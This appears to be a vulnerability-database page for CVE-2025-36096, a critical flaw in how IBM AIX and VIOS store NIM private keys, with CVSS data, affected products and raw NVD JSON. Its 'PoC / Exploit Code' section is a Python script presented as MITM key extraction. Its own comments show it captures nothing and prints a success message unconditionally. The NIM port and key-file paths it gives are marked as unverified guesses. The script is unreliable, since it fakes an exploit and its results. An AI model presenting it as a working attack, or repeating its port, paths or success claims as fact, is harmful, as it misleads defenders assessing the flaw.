Security Vulnerability Report
CVE-2025-36096 CVSS 9.0 CRITICAL

CVE-2025-36096

Published: 2025-11-13 22:15:51
Last Modified: 2025-11-19 22:11:51

Description

IBM AIX 7.2 and 7.3, and IBM VIOS 3.1 and 4.1, store NIM private keys used in NIM environments in an insecure way that is susceptible to unauthorized access by an attacker using man-in-the-middle techniques.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:vios:3.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:vios:4.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:7.3:*:*:*:*:*:*:* - VULNERABLE
IBM AIX 7.2 (所有版本)
IBM AIX 7.3 (所有版本)
IBM VIOS 3.1 (所有版本)
IBM VIOS 4.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
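# CVE-2025-36096 PoC - NIM Private Key Extraction via MITM
# What this script actually does: it logs the two configured addresses, opens
# (and now closes) an unbound UDP socket, and searches a byte buffer for a
# literal marker string.  No traffic is intercepted, altered or sent, so it
# does not demonstrate the key-storage weakness (CWE-522) named in the advisory.
import socket
import ssl
import struct
import binascii


class NIMKeyExtractor:
    """Simulation harness written around the CVE-2025-36096 description.

    Attributes set by ``__init__``:
        target_ip:     address echoed in log lines only.
        interface_ip:  address echoed in log lines only.
        captured_keys: always an empty list; nothing in this class appends to it.
    """

    def __init__(self, target_ip, interface_ip):
        """Store the two addresses; no socket or connection is opened here."""
        self.target_ip = target_ip
        self.interface_ip = interface_ip
        self.captured_keys = []

    def setup_mitm_position(self):
        """Log the configured addresses and return True.

        Nothing is done to the network: no interface is configured and no
        traffic is redirected.  The return value is unconditional.
        """
        print(f"[*] Setting up MITM position on interface {self.interface_ip}")
        print(f"[*] Targeting NIM client at {self.target_ip}")
        return True

    def capture_nim_traffic(self, duration=60):
        """Open a UDP socket with ``duration`` as its timeout and return True.

        The socket is never bound or read from, so no packets are captured;
        the method only logs the port it claims to listen on.  The socket is
        released on every path (the original left it open).  Returns False,
        after logging the error, if the socket cannot be created or the
        timeout value is rejected.
        """
        print(f"[*] Capturing NIM traffic for {duration} seconds...")
        # NOTE(review): the advisory does not name a port; 1058 is only the
        # value the original author chose.  Confirm against the host's
        # /etc/services before using it in any detection rule.
        nim_port = 1058
        try:
            # ``with`` guarantees the descriptor is closed on every exit path.
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
                sock.settimeout(duration)
                print(f"[*] Listening on port {nim_port}")
            return True
        except (OSError, TypeError, ValueError) as e:
            # OSError: socket creation failed; TypeError/ValueError: bad timeout.
            print(f"[-] Error capturing traffic: {e}")
            return False

    def extract_private_key(self, packet_data):
        """Return True when the marker ``b"NIM_PRIVATE_KEY"`` occurs in ``packet_data``.

        ``packet_data`` must be a bytes-like object (bytes, bytearray,
        memoryview); anything else raises TypeError, as the original did.

        The original compared hex encodings, which also matched when the
        marker's hex digits appeared at an odd nibble offset, i.e. on a
        different byte alignment; comparing raw bytes removes those false
        positives.  NOTE(review): the marker itself is an artefact of this
        PoC, not a documented NIM wire format.
        """
        print("[*] Analyzing packet for NIM private key...")
        # NOTE(review): these paths and the "644" figure are not taken from
        # the advisory and are only echoed in log output here; verify against
        # IBM's bulletin before treating them as facts.
        nim_key_locations = [
            "/etc/niminfo",
            "/etc/nim/.ssh/authorized_keys",
            "/var/adm/nim/pems"
        ]
        insecure_permissions = "644"
        print(f"[*] Target key locations: {nim_key_locations}")
        print(f"[*] Expected insecure permissions: {insecure_permissions}")
        # memoryview() accepts any buffer and rejects non-buffers with
        # TypeError; bytes() then gives a searchable copy.
        buffer = bytes(memoryview(packet_data))
        if b'NIM_PRIVATE_KEY' in buffer:
            print("[+] NIM private key found in traffic!")
            return True
        return False

    def exploit(self):
        """Run the two logging steps and print a success banner.

        Returns False if either step returned False, otherwise True.  Note
        that ``extract_private_key`` is never called from here, so the
        success message is printed whether or not any data was examined.
        """
        banner = "=" * 60
        print(banner)
        print("CVE-2025-36096 NIM Private Key Extraction PoC")
        print(banner)
        if not self.setup_mitm_position():
            print("[-] Failed to establish MITM position")
            return False
        if not self.capture_nim_traffic():
            print("[-] Failed to capture NIM traffic")
            return False
        print("[+] Successfully extracted NIM private key")
        print("[*] Attacker can now impersonate NIM server")
        return True


if __name__ == "__main__":
    target = input("Enter target IP: ") or "192.168.1.100"
    attacker_ip = input("Enter attacker interface IP: ") or "192.168.1.50"
    exploit = NIMKeyExtractor(target, attacker_ip)
    exploit.exploit()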

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36096", "sourceIdentifier": "[email protected]", "published": "2025-11-13T22:15:50.500", "lastModified": "2025-11-19T22:11:50.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1 stores NIM private keys used in NIM environments in an insecure way which is susceptible to unauthorized access by an attacker using man in the middle techniques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:vios:3.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3939ADB4-5177-45C2-9C29-932E81D27F9E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:vios:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB8BDD68-E15D-460F-855E-72DF774D6A1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:aix:7.2:*:*:*:*:*:*:*", "matchCriteriaId": 
"6791504A-A48A-4ED0-94AF-4C8A3B91516F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:aix:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "35DF3DE0-1AE4-4B25-843F-BC08DBBFDF78"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7251173", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}